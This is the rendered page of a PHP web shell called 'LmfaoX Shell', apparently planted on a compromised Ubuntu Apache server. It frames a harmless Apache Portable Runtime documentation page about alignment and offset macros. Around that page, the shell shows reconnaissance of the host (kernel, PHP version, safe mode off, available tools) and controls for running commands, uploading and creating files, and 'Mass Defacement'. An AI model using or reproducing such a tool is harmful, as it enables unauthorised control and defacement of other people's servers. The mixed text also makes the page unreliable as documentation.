ShellBanner
System:Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686
Software:Apache. PHP/5.3.6-13ubuntu3.10
ID:uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
Safe Mode:OFF
Open_Basedir:OFF
Freespace:23.03 GB of 70.42 GB (32.7%)
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,

/ usr/ share/ doc/ libapr1-dev/ html/ - drwxr-xr-x

Directory:
Viewing file:     group__apr__general.html (17.16 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Apache Portable Runtime: Miscellaneous library routines
Miscellaneous library routines

Defines

#define FALSE   0
#define TRUE   (!FALSE)
#define APR_ASCII_BLANK   '\040'
#define APR_ASCII_CR   '\015'
#define APR_ASCII_LF   '\012'
#define APR_ASCII_TAB   '\011'
#define APR_OFFSET(p_type, field)   ((long) (((char *) (&(((p_type)NULL)->field))) - ((char *) NULL)))
#define APR_OFFSETOF(s_type, field)   APR_OFFSET(s_type*,field)
#define APR_ALIGN(size, boundary)   (((size) + ((boundary) - 1)) & ~((boundary) - 1))
#define APR_ALIGN_DEFAULT(size)   APR_ALIGN(size, 8)
#define APR_STRINGIFY(n)   APR_STRINGIFY_HELPER(n)
#define APR_STRINGIFY_HELPER(n)   #n
#define memmove(a, b, c)   bcopy(b,a,c)

Typedefs

typedef int apr_signum_t

Functions

void * memchr (const void *s, int c, size_t n)

Detailed Description

This is collection of oddballs that didn't fit anywhere else, and might move to more appropriate headers with the release of APR 1.0.


Define Documentation

#define APR_ALIGN (   size,
  boundary 
)    (((size) + ((boundary) - 1)) & ~((boundary) - 1))

Alignment macros

#define APR_ALIGN_DEFAULT (   size)    APR_ALIGN(size, 8)

Default alignment

#define APR_ASCII_BLANK   '\040'

a space

#define APR_ASCII_CR   '\015'

a carrige return

#define APR_ASCII_LF   '\012'

a line feed

#define APR_ASCII_TAB   '\011'

a tab

#define APR_OFFSET (   p_type,
  field 
)    ((long) (((char *) (&(((p_type)NULL)->field))) - ((char *) NULL)))

Finding offsets of elements within structures. Taken from the X code... they've sweated portability of this stuff so we don't have to. Sigh...

Parameters:
p_typepointer type name
fielddata field within the structure pointed to
Returns:
offset
#define APR_OFFSETOF (   s_type,
  field 
)    APR_OFFSET(s_type*,field)

Finding offsets of elements within structures.

Parameters:
s_typestructure type name
fielddata field within the structure
Returns:
offset
#define APR_STRINGIFY (   n)    APR_STRINGIFY_HELPER(n)

String and memory functions Properly quote a value as a string in the C preprocessor

#define APR_STRINGIFY_HELPER (   n)    #n

Helper macro for APR_STRINGIFY

#define FALSE   0

FALSE

#define TRUE   (!FALSE)

TRUE


Typedef Documentation

typedef int apr_signum_t

signal numbers typedef

Command:
Quick Commands:
Upload:
[Read-Only] Max size: 100MB
PHP Filesystem: <@ Ú
Search File:
regexp
Create File:
Overwrite [Read-Only]
View File:
Mass Defacement:
[+] Main Directory: [+] Defacement Url:
LmfaoX Shell - Private Build [BETA] - v0.1 -; Generated: 0.2795 seconds